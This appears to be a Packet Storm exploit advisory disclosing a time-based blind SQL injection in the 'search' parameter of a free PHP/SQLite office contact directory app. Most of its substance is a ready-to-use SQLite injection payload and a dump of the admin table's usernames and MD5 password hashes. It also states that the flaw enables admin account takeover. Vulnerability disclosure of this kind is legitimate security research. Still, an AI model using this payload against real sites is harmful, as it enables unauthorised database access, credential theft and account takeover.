what you don't know can hurt you

Local Offices Contact Directory Site SQL Injection

Local Offices Contact Directory Site SQL Injection
Posted Oct 4, 2021
Authored by nu11secur1ty

Local Offices Contact Directory Site using PHP and SQLite Free Source Code suffers from a remote SQL injection vulnerability.

tags | exploit, remote, local, php, sql injection
MD5 | b6786101aa6c4cb696251f2b75da6e63

Local Offices Contact Directory Site SQL Injection

Change Mirror Download
https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html

## Vendor:
[href](https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html)

## Description:
The `search` parameter appears to be vulnerable to time-based blind
SQL injection attacks, on the web app "Local Offices Contact
Directories Site" (by oretnom23).
The malicious attacker can execute a malicious payload and he can dump
hashes authentication credentials. Then the attacker can to
take control of the admin account of the system and can steal
sensitive information and can destroy the system administrative
account.


## Payload:
```sql
---
Parameter: search (GET)
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245
AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
```
- dump

```sql
Table: admin_list
[2 entries]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 |
| cblake | cd74fae0a3adf459f73bbf187607ccea |
+----------+----------------------------------+
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/fool-CVE-nu11-100421)

## Proof:
[href](https://streamable.com/zmm464)


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Login or Register to add favorites

File Archive:

November 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    19 Files
  • 2
    Nov 2nd
    25 Files
  • 3
    Nov 3rd
    8 Files
  • 4
    Nov 4th
    7 Files
  • 5
    Nov 5th
    24 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    106 Files
  • 11
    Nov 11th
    19 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    12 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    12 Files
  • 19
    Nov 19th
    4 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    14 Files
  • 24
    Nov 24th
    19 Files
  • 25
    Nov 25th
    4 Files
  • 26
    Nov 26th
    1 Files
  • 27
    Nov 27th
    4 Files
  • 28
    Nov 28th
    1 Files
  • 29
    Nov 29th
    11 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close